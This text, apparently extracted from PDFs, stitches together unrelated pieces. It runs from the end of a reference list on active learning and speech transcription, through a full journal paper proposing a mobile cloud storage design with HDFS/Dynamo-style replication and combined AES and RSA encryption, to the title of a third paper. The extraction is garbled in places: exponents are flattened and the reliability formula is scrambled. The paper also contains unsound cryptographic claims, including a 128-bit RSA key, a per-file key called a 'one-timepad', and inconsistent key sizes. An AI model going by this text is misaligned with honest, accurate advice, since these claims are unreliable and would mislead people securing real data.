Carbonell. 2008. Proactive Learning : Cost-Sensitive Active Learning with Mul- tiple Imperfect Oracles. In Conference on Information and Knowledge Management (CIKM), pages 619–628, Napa Valley, CA, USA. Jesús González-Rubio, Daniel Ortiz-Martı́nez, and Fran- cisco Casacuberta. 2010. Balancing User Effort and Translation Error in Interactive Machine Translation Via Confidence Measures. In Association for Compu- tational Linguistics Conference (ACL), Short Papers Track, pages 173–177, Uppsala, Sweden. Jesús González-Rubio, Daniel Ortiz-Martı́nez, and Fran- cisco Casacuberta. 2011. An active learning scenario for interactive machine translation. In International Conference on Multimodal Interfaces (ICMI), pages 197–200, Alicante, Spain. Gurobi Optimization. 2012. Gurobi Optimizer Refer- ence Manual. Gholamreza Haffari, Maxim Roy, and Anoop Sarkar. 2009. Active Learning for Statistical Phrase-based Machine Translation. In North American Chapter of the Association for Computational Linguistics - Human Language Technologies Conference (NAACL- HLT), pages 415–423, Boulder, CO, USA. Stefan Irnich and Guy Desaulniers. 2005. Shortest Path Problems with Resource Constraints. In Column Gen- eration, pages 33–65. Springer US. Kikuo Maekawa. 2008. Balanced Corpus of Contem- porary Written Japanese. In International Joint Con- ference on Natural Language Processing (IJCNLP), pages 101–102, Hyderabad, India. R. Timothy Marler and Jasbir S. Arora. 2004. Survey of multi-objective optimization methods for engineer- ing. Structural and Multidisciplinary Optimization, 26(6):369–395, April. Evgeny Matusov, Arne Mauser, and Hermann Ney. 2006. Automatic Sentence Segmentation and Punctuation Prediction for Spoken Language Translation. In Inter- national Workshop on Spoken Language Translation (IWSLT), pages 158–165, Kyoto, Japan. Hiroaki Nanjo, Yuya Akita, and Tatsuya Kawahara. 2006. Computer Assisted Speech Transcription Sys- tem for Efficient Speech Archive. In Western Pacific Acoustics Conference (WESPAC), Seoul, Korea. Graham Neubig, Yosuke Nakata, and Shinsuke Mori. 2011. Pointwise Prediction for Robust , Adapt- able Japanese Morphological Analysis. In Associa- tion for Computational Linguistics: Human Language Technologies Conference (ACL-HLT), pages 529–533, Portland, OR, USA. Atsunori Ogawa, Takaaki Hori, and Atsushi Naka- mura. 2013. Discriminative Recognition Rate Esti- mation For N-Best List and Its Application To N-Best Rescoring. In International Conference on Acoustics, Speech, and Signal Processing (ICASSP), pages 6832– 6836, Vancouver, Canada. Judith Reitman Olson and Gary Olson. 1990. The Growth of Cognitive Modeling in Human-Computer Interaction Since GOMS. Human-Computer Interac- tion, 5(2):221–265, June. Fredrik Olsson. 2009. A literature survey of active ma- chine learning in the context of natural language pro- cessing. Technical report, SICS Sweden. David Pisinger. 1994. A Minimal Algorithm for the Multiple-Choice Knapsack Problem. European Jour- nal of Operational Research, 83(2):394–410. John C. Platt. 1999. Probabilistic Outputs for Sup- port Vector Machines and Comparisons to Regularized Likelihood Methods. In Advances in Large Margin Classifiers, pages 61–74. MIT Press. Carl E. Rasmussen and Christopher K.I. Williams. 2006. Gaussian Processes for Machine Learning. MIT Press, Cambridge, MA, USA. Isaias Sanchez-Cortina, Nicolas Serrano, Alberto San- chis, and Alfons Juan. 2012. A prototype for Inter- active Speech Transcription Balancing Error and Su- pervision Effort. In International Conference on Intel- ligent User Interfaces (IUI), pages 325–326, Lisbon, Portugal. Manabu Sassano and Sadao Kurohashi. 2010. Using Smaller Constituents Rather Than Sentences in Ac- tive Learning for Japanese Dependency Parsing. In Association for Computational Linguistics Conference (ACL), pages 356–365, Uppsala, Sweden. Burr Settles, Mark Craven, and Lewis Friedland. 2008. Active Learning with Real Annotation Costs. In Neural Information Processing Systems Conference (NIPS) - Workshop on Cost-Sensitive Learning, Lake Tahoe, NV, United States. Burr Settles. 2008. An Analysis of Active Learning Strategies for Sequence Labeling Tasks. In Confer- ence on Empirical Methods in Natural Language Pro- cessing (EMNLP), pages 1070–1079, Honolulu, USA. Hagen Soltau, Florian Metze, Christian Fügen, and Alex Waibel. 2001. A One-Pass Decoder Based on Poly- morphic Linguistic Context Assignment. In Auto- matic Speech Recognition and Understanding Work- 179 shop (ASRU), pages 214–217, Madonna di Campiglio, Italy. Lucia Specia. 2011. Exploiting Objective Annota- tions for Measuring Translation Post-editing Effort. In Conference of the European Association for Machine Translation (EAMT), pages 73–80, Nice, France. Matthias Sperber, Graham Neubig, Christian Fügen, Satoshi Nakamura, and Alex Waibel. 2013. Efficient Speech Transcription Through Respeaking. In Inter- speech, pages 1087–1091, Lyon, France. Bernhard Suhm, Brad Myers, and Alex Waibel. 2001. Multimodal error correction for speech user inter- faces. Transactions on Computer-Human Interaction, 8(1):60–98. Evimaria Terzi and Panayiotis Tsaparas. 2006. Efficient algorithms for sequence segmentation. In SIAM Con- ference on Data Mining (SDM), Bethesda, MD, USA. Katrin Tomanek and Udo Hahn. 2009. Semi-Supervised Active Learning for Sequence Labeling. In Interna- tional Joint Conference on Natural Language Process- ing (IJCNLP), pages 1039–1047, Singapore. Katrin Tomanek, Udo Hahn, and Steffen Lohmann. 2010. A Cognitive Cost Model of Annotations Based on Eye-Tracking Data. In Association for Compu- tational Linguistics Conference (ACL), pages 1158– 1167, Uppsala, Sweden. Paolo Toth and Daniele Vigo. 2001. The Vehicle Routing Problem. Society for Industrial & Applied Mathemat- ics (SIAM), Philadelphia. Sudheendra Vijayanarasimhan and Kristen Grauman. 2009. Whats It Going to Cost You?: Predicting Ef- fort vs. Informativeness for Multi-Label Image Anno- tations. In Conference on Computer Vision and Pat- tern Recognition (CVPR), pages 2262–2269, Miami Beach, FL, USA. Sudheendra Vijayanarasimhan, Prateek Jain, and Kristen Grauman. 2010. Far-sighted active learning on a bud- get for image and video recognition. In Conference on Computer Vision and Pattern Recognition (CVPR), pages 3035–3042, San Francisco, CA, USA, June. 180 work_igoeh44cmvczdc4di3oxmkl5wy ---- 46 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 A Mobile Terminal Security Strategy Based On the Cloud Storage Wang Hui, Tang Junyong School of Computer Science and Engineering Xi’an Technological University, Xi’an 710032, China Email: 277019826@qq.com Abstract. With the emergence of mass storage systems and the development of the Distributed File System, Cloud storage system has become the focus of the industry. The cloud storage services on mobile terminal have been putted on the agenda based on the rapid development of intelligent mobile terminal. Based on the analysis of the architecture of HDFS and Dynamo, a mobile Terminal Security strategy is presented in this paper. The database technology and t he dynamic consistent hashing algorithm are adopted to deal with different target groups. According to the storage costs of nodes, data would be integrated scheduling by the storage system. Make full use of the advantages of AES(Advanced Encryption Standard) and RSA. A solution that combines AES and RSA encryption algorithm is proposed to implement the mobile terminal cloud storage security. Through the theoretical analysis and the simulation results, the cloud storage strategy proposed in this paper can make the cloud system achieve load balance. Moreover, multi-copy mechanism can improve the overall efficiency of the system. Keywords: Cloud Storage, HDFS, Dynamo, Dynamic Consistent Hashing Algorithm, AES, RSA, Multi - Copy Mechanism 1. Introduction With the rapid development of the Internet of things, more and more people are used to using mobile devices such as smart phones to surf the Internet, chat, browse news, shopping entertainment, and view all kinds of information. Traditional mobile cloud storage systems have lower storage density, the overall storage efficiency is low too. Traditional cloud storage systems do not adapt well to different application environment sand do not guarantee the integrity and confidentiality of cloud data. The cloud storage service does not guarantee that the data and operation of mobile users will not be lost, damaged, leaked, or illegally exploited by malicious or non-malicious. So it’s very dangerous for sensitive data to be stored directly in the cloud. Simple encryption techniques have key management issues and can’t support complex requirements such as query, parallel modification, and fine-grained authorization. As a result, a mobile cloud storage security technology solution is proposed in this paper, which enables reliable and secure cloud storage. First, the distributed file system (the hadoop distributed file system, HDFS) and Dynamo would be compared in this paper, and then the dynamic consistency hash algorithm is introduced to realize the processing of data in different size. According to the storage cost of each storage node, select the optimal storage node to implement the access of mobile cloud storage. The relational database is used for storing indexes in small object files, and the class Dynamo system model is used to handle large object files. A Mobile Terminal Security Strategy Based On the Cloud Storage 47 The cloud storage system will choose the closest copy when the mobile terminal makes a request. This method can effectively improve the storage efficiency of the cloud system and ensure the load balance of the system. On the basis of implementing the mobile cloud storage, we make full use of advantages of AES and RSA algorithms, a cloud storage security scheme for mobile is proposed in this paper. The solution combines AES and RSA encryption algorithms to improve the shortcomings of the cloud storage system. The reliability model of the cloud storage system is also proposed in the paper. Finally, a series of simulation experiments show that the proposed cloud storage security technology scheme is a reliable scheme with higher security. 2. System Architecture of the Mobile Cloud Storag Cloud Storage is developed on the basis of clustering techniques and embedded virtualized technologies, which is an extension of cloud computing. Grid technology, cluster technology and distributed system are used in cloud storage, which coordinated all different types of storage devices in the network. All these technologies and devices can be cooperated with cloud storage to provide the required data storage capabilities and related business visit. Cloud storage is not a single storage device. The nature of cloud storage is not storage. The essence of cloud storage is providing services. Different ways are taken to deal with different sizes of objects. In this way, system architecture of the mobile cloud storage is designed . System architecture of the mobile cloud storage is shown in figure 1. Figure.1 System Architecture of the Mobile Cloud Storage Users access the network through a mobile terminal. The lowest load in the dispatcher group is selected by the mobile terminal and then communicates with it. Depending on the size of the file to determine whether control is handed over to the relational database machine group or to the storage group. Small files are handed over to the relational database machine group, and large files are processed by the storage group machine group. The copy mechanism was introduced to improve the reliability of the cloud storage system, multiple-copy mechanism can effectively improve system efficiency. When a mobile terminal makes a request, the closest copy can be chosen. The primary copy would be selected first in traditional cloud storage system. The request is made to the standby copy only when the master copy is wrong. This process affects the speed of the traditional cloud storage system without considering the location of the copy. Different storage policies and backup solutions are described in this article, which are used in the relational database machine group and the storage group machine group. 48 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 3. Storage Policies and Backup Plans HDFS and Dynamo are reliable solutions that are commonly used in the cloud storage system. HDFS is a distributed file system that is suitable for running on common hardware. HDFS has good fault tolerance and can be used for inexpensive hardware. HDFS provides data access mechanisms with high throughput that can be widely applied to large data sets. Distributed file systems are developed on the infrastructure of the Apache Nutch search engine and apply to batch processing for data storage. HDFS emphasizes data throughput rather than response time for accessing data. The program in HDFS has a lot of data sets. File size of the HDFS is typically gigabyte to terabyte. As a result, terabytes of large files can be supported in HDFS through higher aggregated data bandwidth. And hundreds of nodal devices can be contained in a cluster, which allowing the terabytes of large files to be supported in it. Dynamo is storage platform of amazon, and the key-value pair is used to store data in the key-value database schema. Dynamo has better availability and the higher extensibility. In Dynamo, the data are segmented according to the hash algorithm used in distributed file systems. And then all these segmented data are stored in separate nodes. The corresponding node is searched according to the hash value of the key, so that the read operation is realized in Dynamo. The consistency hash algorithm is used by Dynamo. At that time, it’s not the exact hash value, but a range of hash values. When the hash value of the key is in this range, it will be searched clockwise along the loop, and the first node encountered is what we need. The consistency hash algorithm is improved by Dynamo, and in the ring，a set of devices are acted as a node rather than only one device is acted as a node. The synchronization mechanism is used to achieve the consistency of the data. In HDFS the numbers of the copies are set to be 3. Whether the data would be stored in the node or not depends on the capacity of the node. The greater the capacity of the node, the greater the probability that the data will be stored in this node. So, when the capacity of the node is quite different, the nodes with large storage capacity in the system would be overloaded. The copy mechanism proposed in this paper can achieve load balancing, and the reliability and availability of cloud storage are also effectively improved. The system replication policy includes dynamic replica policies and static replica policies. The static copy strategy refers to the numbers of copies. The placement is fixed from the start to the data failure. The dynamic copy strategy is a strategy that system can adjust the numbers of copies in real time and their location, depending on performance requirements, load, and so on. The copy strategies for small files and large files are described as follows. 3.1 The copy strategy for a small file Files that do not exceed 10MB are defined as small files. The SQL Server relational database is used as the copy strategy for small files. After receiving the file from the mobile terminal, the dispatcher will judge its size first, and then, once the small file is identified, it will be handed over to the relational database machine group. The correlation properties of the file are stored in the database table. The optimal node with the lightest load is dynamically selected by the database machine group. The lightest load database server in the machine group is selected to store the file, and keep a copy to ensure the reliability of the data. The IP address of the database server will be stored in the primary server. The IP address of the database server is retrieved and got from the primary server and then interacts with the database server. The storage processing pattern for small files is shown in figure 2. A Mobile Terminal Security Strategy Based On the Cloud Storage 49 Figure.2 The Storage Processing Pattern for Small Files The corresponding relationship is stored in the data table in the primary server, and the corresponding relationship is the file name and the server IP address. The data table is shown in table I. Table 1 Data Tables in the Primary Server Field Typ Length Note ID int Serial number fname varchar 255 Filename IP varchar 15 IP address File names, file sizes, and content are stored in the database server. The file information table is shown in table 2. Table 2 The File Information table Field Typ Length Note ID int Serial number fname varchar 255 Filename fsize int File size creat datetime creation time context mediumtext Content 3.2 The Copy strategy for large files Files larger than 10MB are called large files. The storage group is used as a copy strategy for large files. The system architecture of the storage group is fully connected. The system architecture is shown in figure 3. The PC is used as a storage medium in the storage group. However, the reliability of the PC is not high, and it will even fail when the data is stored. Therefore, a copy is required to ensure that the data is reliable. 50 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Figure.3 The System Architecture Diagram of the Storage Group In the storage group system, all information about adjacent nodes are stored in every PC. The needed storage nodes can be found quickly through querying the information stored in the nodes. The structure of storage space in the storage group is ring, and at the same time, the method of the unified addressing is adopted. In the storage group, the difference in performance of the PC can be offset by the virtual contiguous storage space. First, the hash Algorithm message-digest Algorithm 5 is used to implement system address conversion. The actual physical address is processed and converted to 32- bit information string through the MD5 algorithm, And then these information string are stored in the virtual continuous address. Thus, the differences in performance between devices will be offset. The loop storage structure of the storage group is shown in figure 4. Figure.4 The Loop Storage Structure of the Storage Group The converted address is mapped to the virtual storage space loop of the storage group through the MD5 algorithm. The device is found in the clockwise direction, and then the data is stored in the first PC mapped. The data is backed up to two adjacent PC. The larger the amount of data in the system, the more uniform the spatial distribution will be. The data are stored when the routing of the corresponding PC and adjacent PC are updated. The routing information table is shown in table 3. Table 3 Routing Table Field Typ Length Note ID int Serial number fname varchar 255 Filename fsize int File size IP varchar 15 IP address A Mobile Terminal Security Strategy Based On the Cloud Storage 51 The IP address of the PC device where the file replica is located is stored in the IP field In the routing information table. The IP field is the routing information for the adjacent PC. Once a node fails, all the information stored in the node are backed up and the routing information of the adjacent node is modified in time. According to the principle of the consistency hash algorithm, the storage space of the new PC device will be mapped to the new virtual address space when a new device needs to be added to the storage group. The existing space on the ring will not be changed, and this method can be very effective in avoiding the vibration of the address space. Meanwhile, the routing information on the adjacent PC are updated. The process of adding a PC is as shown in figure 5. Figure.5 The Process of Adding A PC The process of exiting the storage group is essentially the same as the process of joining. In the clockwise direction, there are three PC in the storage group, X, Y, and Z. If Y applied to get out of the loop， the information that was stored in the Y would be copied from X to Z, and the information that was stored in the Y would be copied from Z to X, and then, the data in Y-master backup is copied to the first device from z of the loop. 4. Security Design of the Cloud Storage Cloud storage is a hot topic in industry and academia in recent years, and the security problems of the cloud storage would have been under scrutiny. The AES(Advanced Encryption Standard) algorithm is simple and the encryption of AES is fast. However, AES has problems with key allocation and confidentiality management. There is no need for secret allocation of keys in asymmetric encryption algorithms, and at the same time the security of the keys is easier. In addition, user authentication and digital signatures can be achieved through the RSA algorithm. To make full use of the advantages of the AES and RSA algorithms, a solution that combines AES and RSA encryption algorithms for mobile terminal cloud storage security design is proposed in the paper. 4.1 Encryption and decryption design for Mobile terminal After the data is encrypted through AES, then the encryption key is encrypted by RSA. The encrypted key message are binded to the encrypted data. The message will then be stored in each node of the HDFS. This approach can improve the storage efficiency of the mobile cloud storage system and also solve the key distribution of single key cryptography. When the data on HDFS is read and downloaded, The IP address of the adjacent PC is got by broadcast The virtual address is obtained through the consistency hash algorithm Update the routing table Update the routing table of the adjacent PC 52 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 the AES key is extracted from the cryptograph, then the decryption is obtained through the user’s private key, finally, the document is declassified and plain text is obtained. The process is as follows. 1) During data encryption uploads, users log in to the cloud storage system, Sending data requests to HDFS and encrypting the transfer. At the same time, a 128-bit AES encryption key is generated by the client random key generator. 2) On the mobile side, the data that needs to be transmitted is encrypted with the AES key, and the cipher text would be got. 3) The encryption KEY of the file is encrypted through the 128-bit RSA public KEY, and then the key cipher is obtained. 4) The key cipher are bound to the file cipher, In accordance with the file cipher, the file is stored in the HDFS file system with the corresponding tag bit and data length identification. 5) When the data is downloaded from an HDFS system in the cloud, the data are decrypted and downloaded. After the data are obtained, which are transferred from the HDFS system to the mobile end. The first bit of data is judged first by the system, and if it is zero means that the data is in plain text, the data are restored after removing the tag bits. On the contrary, if it is 1 means that the data is a cipher, it should be decrypted. 6) First, extract a 128-byte AES key cipher from the data, AES plaintext key are got by decrypted the user’s personal RSA private key. 7) The Cipher part of the stored file cipher is decrypted by AES through the AES key, and then the stored file plaintext is got 4.2 The data storage format of the cloud storage system The data for the cloud storage system includes two storage formats, which are plaintext storage and crypto text storage. The storage format is shown in figure 6 Figure.6 The Storage Format of the File If the first digit in the storage format is 0, which means that the data is stored in plain text, on the contrary, if it is 1 means that the data is a cipher. The 128 bytes need to be added before the cipher text to store the AES cipher key encoded by RSA when the data is stored in cipher text. The field for the valid (b)The storage format of Cipher text file 1 KEY 1bit Data length Cipher 128Byte 4Byte (a)The storage format of the plaintext file 0 plaintext 1bit A Mobile Terminal Security Strategy Based On the Cloud Storage 53 length of the data is 4 bytes, and the field of Cipher represents the encrypted text by AES. Each 1024-byte byte stream is encrypted with AES and is converted into a 1040-byte cipher stream. So the length of the Cipher section grows relative to the original plaintext data. 4.3 Security analysis The security design of the mobile cloud storage is implemented in a combination of the AES algorithm and the RSA algorithm. The security is analyzed separately for the AES and RSA algorithms. The security of AES is analyzed through exhaustive attack, the differential attack, and interpolation attack when the AES key don’t be known. 1) Exhaustive attack: The average complexity of the exhaustive key is 2k-1 AES encryption, in which K is the length of the key. For the 128-bit key in this scheme, 2127 times of AES encryption are required and the calculation is very large, and obviously this method of attack is invalid. 2) Differential attack: The wide trajectory strategy adopted by the AES algorithm can effectively resist differential attacks. The prediction probability of the difference trajectory is between 2 and 150 after four rounds of transformation, it’s between 2 and 300 after the eight transformations. So, enough times can be identified to make all the differential trajectory less than 1/2n-1, n is the number of blocks. This makes the difference attack fail. 3) Interpolation attack: F256 domain in AES algorithm, expansion is shown as blow: 63+8FX127+B5X191+01X223+F4X239+25X247+F9X251+09X253+05X254 Because the expansion is complex, the attack is also invalid. Through this analysis, The AES algorithm is better immune to known attacks the unknown AES key, From the analysis above, we can learn that the AES algorithm is better immune to known attacks in case of not knowing the AES key. Also, the user’s files in HDFS are stored in a certain size, and the security of the system can be further enhanced. Therefore, the main issue of security is the security of the AES file encryption key. How to manage and store file encryption keys is the key to determining the security of the solution. In the design scenario presented in this article, Technology of one-timepad is used for file transfer storage. Each data stored has a different AES key, and the AES key is transparent to the user. In addition, the AES key for each file is encrypted by using the RSA algorithm. The encrypted AES key is bound to the file cipher and then stored in HDFS. The user must take care of his RSA private key throughout the process. The above encryption is done on the mobile side, which implements the file’s cryptographic transfer and cryptographic storage. And then the security of RSA is analyzed in detail. The security of RSA depends on the large integer factorization. The difficulty of attacking the RSA system is the difficulty of the large integer factorization. The Schroeppel algorithm is a better factorization algorithm, and which is often used to analyze the problems of the large integer factorization. The number of operations required in decomposing the factor of decimal number n with different length by using Schroeppel algorithm. The number of decomposing operations is shown in table IV, in which the factor of decimal number n with different length is decomposed by using Schroeppel algorithm. 54 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Table 4 The Number of Operations of Decomposition Factor By Using the Schroeppel digits of Decimal number n 50 100 200 300 400 the number of operation 1.3×1010 2.4×1015 1.1×1023 1.4×1029 2.6×1034 The longer the length of n is, the more difficult the factorization is in the RSA algorithm. For every ten bits of binary that are added, the time of decomposition is going to be doubled. And then the harder it is to decode the password, the more the strength of the encryption will be. A key length of 512, 1024, 2048 bit are often selected in RSA. In the cloud storage security technology solution designed in this paper, the 16-byte AES key is the object of RSA encryption, the system will be highly secure once the key of 2048 bit is selected. Assuming that the reliability of the cloud storage system is A. The time of encryption through different encryption algorithms is At, the encryption time At is reversed first，and after the normalization processing，Aj is got from At. The transfer rate of a file with the same size after the normalization processing is Ak，n is the copynumber. The reliability model of the system is: ])1(1][)1(1[ nk n j AAA −−−−= (1) It can be concluded through the analysis of the reliability model, when the value of Aj and Ak are more closer to 1, and the number of n is more larger, the cloud storage system will be more reliable and with higher security. 5. Experiment and Result Analysis The Hadoop cluster built in this article consists of one namenode server and three datanode servers. The client submits the data through the namenode server. The configuration of the four datanode servers is: Intel dual core CPUG630@2700MHz; network environment for NetLink BCM5784 Gigabit Ethernet; The version of Hadoop is 1.0.3; The version of Linux is ubuntu 11.10; And JDK 1.6.0 _17 is used. The configuration of Client is Pentium/(R) Dual-core CPU E5200@2.5GHz. The mobile terminal is Huawei y635-cl00, Qualcomm Snapdragon CPU and 1 GB memory are used. A certain number of storage nodes are simulated by using CloudSim simulation. The data response tests are performed on file upload, file copy and file movement, for large files and small files respectively. System is tested by using a smart mobile terminal. Experimental results demonstrate that the page is properly displayed, and the response time of the login page is basically completed within two seconds. The percentage of the response time for the transaction is shown in figure 7. Figure.7 The Percentage of the Response Time for the Transaction A Mobile Terminal Security Strategy Based On the Cloud Storage 55 Through the analysis of figure 7, it can be known that 94 percent of transactions in a mobile cloud storage system can be implemented quickly within two seconds. The experimental results show that the system responds fast. The average response time of the transaction is obtained from the diagram. Although one of the transaction response time is longer, but the response time for most other transactions is acceptable. When this happens, it is thought that the performance of the mobile cloud storage system is better. After the encryption and decryption mechanism is introduced in the security of the mobile cloud storage, the security of the cloud storage is improved effectively. There are two questions to be considered: The impact of encryption and decryption on file speed; The impact of encryption and decryption on the performance of the client host. In the mobile cloud storage security technology proposed in this article, the method of encrypting and decrypting the file on the mobile end is used. The length of the file will change after the file is encrypted into a cipher file. According to the analysis of the file storage format in 4.2. The header of each cipher file needs to be added 128 bytes to store the AES secret key. In addition, when the AES file is encrypted, each 1024 bytes text will be encrypted and then changed to 1040 bytes cipher. In conclusion, after encrypting，the length of the cipher file is about 1.56 percent more than the file. The namenode and datanode in HDFS may be caused an additional cost of about 1.56 percent after encrypting. For clientnode in HDFS, the time spent on file encryption and decryption is increased, and the performance is reduced eventually. The effect of file encryption and decryption on the whole file transfer rate is mainly in two aspects: The time required to encrypt and decrypt the transmission file by using AES; The time spent on encrypting and decrypting the AES key by using RSA. The experimental data are listed in table 5, which includes the time spent on encrypting the different sizes or different types files by using AES and the time spent on transmitting the file in HDFS. Table 5 Time Comparison on AES Encryption and Decryption File size File type AES encryption HDS upload AES decryption HDS download （M）（ms）（ms）（ms）（ms） 3.07 pdf 1050 2685 370 2800 3.22 MP3 1178 2600 478 2830 23.8 mkv 3238 5930 2648 6290 25.8 doc 3140 5260 2163 6400 166.518 rmvb 23830 46400 16500 42460 The time that AES KEY is encrypted by using RSA are also tested. By using RSA the 128bit AES key was encrypted for an average time of 499ms and decrypted for an average time of 32ms. It can be concluded from the above test data, the time spent on encryption or decryption by using AES is regardless of the file type. The time comparison on AES encryption and decryption is shown in figure 8. 56 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 Figure.8 Time Comparison on AES Encryption and Decryption The same size files are encrypted by different AES, RSA, or RSA + AES algorithms and then the encryption time is different, as shown in table X. Table 6 Time Comparison for Different Algorithm Encryption File size AES encryption RSA encryption AES+RSA encryption （M）（ms）（ms）（ms） 3.04 1048 753 770 23.15 3230 2889 2901 167.58 23820 23598 23612 In the solution proposed in this paper， the time of AES key encrypted or decrypted by using RSA is relatively short. File transferring have little impact on total time loss and user experience. It may takes a relatively long time to encrypt files by using the AES, which cause a significant additional time overhead for HDFS. However, the encryption time that AES combined with RSA for encrypting the file was not significantly increased compared to RSA. Besides the impact on overall transmission rates, the impact of encryption and decryption on mobile performance is also important. The 167.58 MB file in table VI is the test case. Table 7 and table 8 are the test result. Table 7 The Performance of the Mobile End Upload the Data type of test utilization rate of transmission utilization rate of Mobile CPU（%） rate（Mbps） Mobile /transmission rate Raw data 16.436 3.57020 4.603663 After the encryption 38.432 2.36015 16.283711 Table 8 The Performance of the Mobile End Download the Data type of test utilization rate of transmission utilization rate of Mobile CPU（%） rate（Mbps） Mobile /transmission rate Raw data 14.681 3.90135 3.763056 After the encryption 35.221 2.76147 12.754439 A Mobile Terminal Security Strategy Based On the Cloud Storage 57 The ratio of CPU occupancy to upload speed is shown in table 7, which the data on the mobile side are tested before the encryption and after the encryption respectively. The ratio of CPU occupancy to download speed is shown in table 8, which the data on the mobile side are tested before the decryption and after the decryption respectively. It can be known from the table 7 and the table 8, if the encryption and decryption mechanism are used for HDFS transmission, then the CPU utilization will be increased by an average of 22% ~ 25% and the overall file transfer rate will be reduced by 30% ~ 35%. As we can see, when the encryption and the decryption mechanism are used, more than three times the performance loss can be caused on the mobile end side. Although the encryption mechanism and decryption mechanism will cause some performance loss to the mobile end, the confidentiality of the data can be guaranteed. So it is acceptable from the perspective of user data security. Lots of time are spent during encryption or decryption, which can cause a drop in transmission rates. Two points of improvement are proposed for this situation: 1) The user can choose whether or not to encrypt the file. Important files are usually in the form of text or images, which are generally small and can choose to be encrypted. However, some larger files, such as video, audio, etc., users can choose whether to encrypt or not. The less important files are stored in plain text, which can improve the access efficiency of the files. 2) For cloud storage users, the file transfer and stored procedures are transparent. Therefore, the transport encryption buffer can be set up on the client for large file transferring. After the transfer request is submitted by the user, the file’s decryption and transfer operations are implemented in the background. After the transfer is completed, only the prompt message can be given on the mobile end, which can improve the user experience. Using the reliability model formula of the cloud storage system proposed in 4.3, combine the time required for processing the same size of file in table 6, when a different algorithm AES, RSA, or RSA + AES is used, the encryption time required for encrypting file, after that the encryption time is reversed, Aj then be got after the encryption time is normalized. In the same way, after normalizing, transfer rate Ak is got. If both Aj and Ak are closer to 1, and the number of copies in the cloud storage system is larger, then the reliability of the system is higher. According to the above analysis, the data in one hour is sampled continuously, combined with the data in table 6 and table 7, the reliability contrast diagram for the cloud storage system is shown in figure 9. Figure.9 The Reliability Contrast Diagram 58 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 It can be know the reliability of the system through different algorithm by comparing the data in figure 9. By using the RSA encryption, the system’s reliability values are almost maintained at 1. The reliability of the system is relatively high. That is, it has little impact on file transfer and user experience by using RSA encryption. It may takes a relatively long time to encrypt files by using the AES. And the reliability of the system is very jitter. It is shown that the system reliability is low with AES encryption. However, the encryption time that AES combined with RSA for encrypting the file was not significantly increased compared to RSA. The value of the system reliability is consistent with the use of RSA, which can be maintained around 1. It is concluded that the system is relatively reliable by using AES and RSA encryption. Through the simulation experiment, it is verified that the mobile cloud storage system has a good user experience. It is also verified that the multi-copy mechanism of the cloud storage system can effectively improve the efficiency of the cloud storage system. When a mobile terminal makes a request, the closest copy is selected and then the time can be saved effectively. In the solution presented in this paper, the encryption and decryption performed by the mobile side has the following characteristics: transport security and storage security of the user data are guaranteed. The mobile side finish the encryption before calculating the checksum, so the encryption will not break the HDFS data integrity check mechanism. In the entire distributed file storage system, the encryption and decryption are scattered to the various mobile devices. While this will cause some performance damage to the mobile, there is no additional performance penalty for namenode and datanode. The solution enables the entire distributed file system to be protected by data privacy, and there is no significant performance penalty for multi-user, large access, and file access. In the current version of HDFS, the mobile user identity is given by the host operating system. The user authentication mechanism for the HDFS mobile is also very flawed. In the scheme proposed in this paper, the RSA algorithm and its public key library are introduced, which can create the prerequisite for solving the kind of problem. 6. Conclusion Cloud storage security technologies for mobile terminals proposed in this paper, different storage policies are used for file in different size. Considering the storage efficiency of mobile, the load balancing effect of cloud storage system is improved, and the stability and extensibility of cloud storage system is improved. In addition, in order to make the cloud storage system has higher reliability. According to the characteristics of HDFS data input output and integrity checking, the AES algorithm is used to encrypt the files uploaded by the user on the client side of HDFS. This ensures that the confidentiality of mobile user data in the cloud storage system. By using the RSA algorithm, the security of the AES key is guaranteed, and the issue of distribution and management of the AES single key password can be resolved. The two storage formats of the cloud file are designed to implement the user’s own choice, reduce the number of copies, and ultimately improve the storage efficiency of the mobile cloud storage system. Finally, the reliability of the mobile cloud storage security technology scheme is verified through a series of simulation experiments. The mobile cloud storage security technology scheme proposed In this paper has better security and reliability. But there are still many problems that have not been solved, and further research is needed. A Mobile Terminal Security Strategy Based On the Cloud Storage 59 In order to improve the user experience by setting up the encryption buffer. At the same time, PKI technology can be used to implement CA authentication and digital signatures for HDFS users to further enhance HDFS security. Foundation Item The Industrial research project of Science and Technology Department of Shaanxi Province(Grant No. 2016KTZDGY4-09) References [1] IDZIOREK J, TANNIAN M, JACOBSON D. Attribution of Fraudulent Resource Consumption in the Cloud [J]. 2012 IEEE Fifth International Conference on Cloud Computing, 2012：99-106. [2] TSAI T, THEERA -AMPORNPUNT N, BAGCHI S. A study of soft error consequences in hard disk drives [J].IEEE/IFIP International Conference on Dependable Systems and Networks (DSN 2012), 2012:1-8. [3] Schmuck F B, Haskin R L.GPFS: A shared-disk file system for large computing clusters[C]//Proceedings of the Conference on File and Storage Technologies, January 28-30, 2002:231-244. [4] Namjoshi J, Gupte A. Service oriented architecture for cloud based travel reservation software as a service[C]// Proceedingsof the 2009 IEEE International Conference on Cloud Computing(CLOUD’09), Bangalore, India， Sep 21-25, 2009.Los Alamitos, CA, USA: IEEE Computer Society, 2009:147-150. [5] Goth G. Virtualization: Old technology offers huge new potential [J].IEEE Distributed Systems Online, 2007,8(2). [6] BOWERS K D, JUELS A, OPREA A. Proofs of retrievability : theory and implementation [J]. Proceedings of the 2009 ACM workshop on Cloud computing security (CCSW′ 09), 2009:43. [7] ARMBRUST M, STOICA I, ZAHARIA M, et al. A view of cloud computing [C]. Communications of the ACM , 2010, 53(4):50. [8] MELL P, GRANCE T. NIST Special Publication 800 -145:The NIST Definition of Cloud Computing [J]. National Institute of Standards and Technology, 2011. [9] KARAME G O, CAPKUN S, MAURER U. Privacy -preserving outsourcing of brute-force key searches[J]. Proceedings of the 3rd ACM workshop on Cloud computing security workshop (CCSW′ 11): 2011:101. [10] SCHIFFMAN J, MOYER T, VIJAYAKUMAR H, et al. Seeding clouds with trust anchors [J]. Proceedings of the2010 ACM workshop on Cloud computing security workshop (CCSW′ 10), 2010: 43 work_ijabiykaibfnhbma2tyfindlu4 ---- D4V: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications Submitted 